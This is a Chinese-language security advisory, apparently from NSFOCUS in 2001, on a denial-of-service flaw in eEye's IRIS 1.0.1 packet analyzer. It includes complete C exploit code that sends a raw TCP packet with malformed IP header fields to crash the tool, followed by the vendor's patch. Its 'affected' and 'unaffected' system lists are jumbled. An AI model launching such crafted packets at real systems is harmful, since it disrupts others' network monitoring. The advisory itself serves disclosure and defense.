首页 -> 安全研究
安全研究
安全漏洞
Iris 拒绝服务攻击漏洞
发布日期:2001-02-01
更新日期:2001-02-01
受影响系统:
不受影响系统:
eEye Digital Security IRIS 1.0.1
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
描述:
eEye Digital Security IRIS 2.0
eEye Digital Security 设计的 IRIS 是一个用于网络管理的协议分析工具,某些版
本存在一个漏洞,容易遭受拒绝服务攻击。远程用户可以构造一个畸形的报文,IRIS
捕捉到这个报文后试图解析它,最终导致IRIS崩溃。
<* 来源:(grazer@digit-labs.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的测试程序由 grazer@digit-labs.org 提供
--------------------------------------------------------------------------
/* Denial of Service attack against :
* Iris The Network Traffic Analyzer beta 1.01
* ------------------------------------------------
*
* Will create an incorrect packet which will cause
* Iris to hang when it is opened by a user.
*
* Vulnerability found by : grazer@digit-labs.org
* Exploit code by : grazer@digit-labs.org
*
* Respect to the guys from eEye, for there fast
* response.
*
* greetings to hit2000, hwa, synnergy, otgpdvt, security.is
* digit-labs.
*
* ---------------> free sk8!!!! <-----------------
*
* ------------------------------------------------
* http://www.digit-labs.org
* grazer@digit-labs.org
* ------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>
int build_packet(int sfd, u_long srcaddr, u_long dstaddr);
struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};
int main(int argc,char **argv){
int rawfd, check, one=1;
struct sockaddr_in raddr;
struct in_addr source_ip, desti_ip;
struct ip *ip;
struct tcphdr *tcp;
while (argc<3) {
fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);}
fprintf(stderr, "\nStarting Iris DoS...\n");
if((check=gethostbyname(argv[2])==NULL)) {
fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }
source_ip.s_addr= inet_addr(argv[1]);
desti_ip.s_addr = inet_addr(argv[2]);
if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
fprintf(stderr, "\n You need root for this..");
exit(0); }
setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);
build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);
close(rawfd);
return 1; }
int build_packet(int sfd, u_long srcaddr, u_long dstaddr) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
bzero(packet, sizeof(packet));
bzero(&sin,sizeof(sin));
src_inaddr.s_addr = srcaddr;
dest_inaddr.s_addr = dstaddr;
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 1;
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
ip->ip_v = -1;
ip->ip_hl = -1;
ip->ip_id = -1;
ip->ip_src = src_inaddr;
ip->ip_dst = dest_inaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40;
ip->ip_off = -1;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
tcp->seq = htonl(rand());
tcp->ack = htonl(rand());
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=dstaddr;
sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *) &sin,sizeof(sin));
fprintf(stderr, "\n Packet send... \n\n" );
return 1;
}
建议:
厂商补丁:
eEye已经提供了一个新的版本Iris 2.0以解决这个问题:
http://www.eeye.com
浏览次数:8117
严重程度:0(网友投票)
绿盟科技给您安全的保障